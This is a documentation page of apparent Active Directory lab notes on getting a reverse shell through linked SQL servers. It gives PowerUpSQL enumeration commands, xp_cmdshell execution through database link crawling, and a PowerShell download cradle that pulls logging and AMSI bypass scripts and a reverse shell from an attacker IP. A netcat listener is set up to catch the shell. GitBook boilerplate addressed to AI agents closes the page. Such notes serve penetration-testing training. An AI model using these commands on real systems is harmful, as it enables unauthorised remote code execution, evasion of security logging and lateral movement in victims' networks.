> For the complete documentation index, see [llms.txt](https://omar-4.gitbook.io/omar-docs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://omar-4.gitbook.io/omar-docs/attacks/sql-server-reverse-shell.md). # SQL server Reverse Shell Let's start with enumerating SQL servers in the domain and if studentx has privileges to connect to any of them. We can use PowerUpSQL module for that. Run the below command from a PowerShell session started using Invisi-Shell: ``` Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1 ``` ``` Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose ``` use Get-SQLServerLinkCrawl for crawling the database links automatically: ``` Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose ``` Sweet! We have sysadmin on eu-sql server! If xp\_cmdshell is enabled (or RPC out is true - which is set to false in this case), it is possible to execute commands on eu-sql using linked databases. To avoid dealing with a large number of quotes and escapes, we can use the following command: ``` Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'set username'" ``` **Create Invoke-PowerShellTcpEx.ps1:** * Create a copy of Invoke-PowerShellTcp.ps1 and rename it to Invoke-PowerShellTcpEx.ps1. * Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (Right click on it and click Edit). * Add "Power -Reverse -IPAddress 172.16.100.X -Port 443" (without quotes) to the end of the file. Let's try to execute a PowerShell download execute cradle to execute a PowerShell reverse shell on the eu-sql instance. Remember to start a listener: ``` Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.x/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.x/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.x/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sqlx ``` Turn On the listener: ``` c:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443 ``` ``` $env:username ``` ``` $env:computername ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://omar-4.gitbook.io/omar-docs/attacks/sql-server-reverse-shell.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.